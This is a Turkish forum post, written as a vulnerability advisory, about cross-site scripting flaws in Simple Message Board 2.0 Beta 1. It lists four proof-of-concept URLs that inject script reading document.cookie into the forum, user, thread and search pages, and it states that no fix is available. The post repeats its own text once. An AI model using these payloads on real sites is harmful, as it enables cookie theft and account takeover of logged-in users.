Death_AngeL
Banned
- Katılım
- 27 Haz 2005
- Mesajlar
- 602
- Reaction score
- 0
- Puanları
- 0
Simple Message Board XSS Açığı
Simple Message Board 2.0 Beta 1 ve muhtemelen önceki sürümlerinde 'forum.cfm', 'user.cfm', thread.cfm' ve 'search.cfm' scriptlerinin HTML filtrelemesi yapaması yüzünden XSS açıkları meydana gelmekte.
Açık cookie denetimleriyle login olmuş kullanıcıların bilgilerine ulaşılmasına olanak veriyor.
Örnek Kodlar :
Board anasayfası : http://www.simplemessageboard.com
Şuan için bir çözüm bulunmamaktaymış
Simple Message Board 2.0 Beta 1 ve muhtemelen önceki sürümlerinde 'forum.cfm', 'user.cfm', thread.cfm' ve 'search.cfm' scriptlerinin HTML filtrelemesi yapaması yüzünden XSS açıkları meydana gelmekte.
Açık cookie denetimleriyle login olmuş kullanıcıların bilgilerine ulaşılmasına olanak veriyor.
Örnek Kodlar :
Kod:
QUOTE:
http://[target]/forum/forum.cfm?FID=<script>JavaScript:a lert(document.cookie);</script>
http://[target]/forum/user.cfm?UID=<script>JavaScript:alert(document.cookie);</script>
http://[target]/forum/thread.cfm?TID=<script> JavaScript:alert(document.cookie);</script>
http://[target]/forum/search.cfm?PostDate=<script>JavaScript:alert(document.cookie);</script>Board anasayfası : http://www.simplemessageboard.com
Şuan için bir çözüm bulunmamaktaymış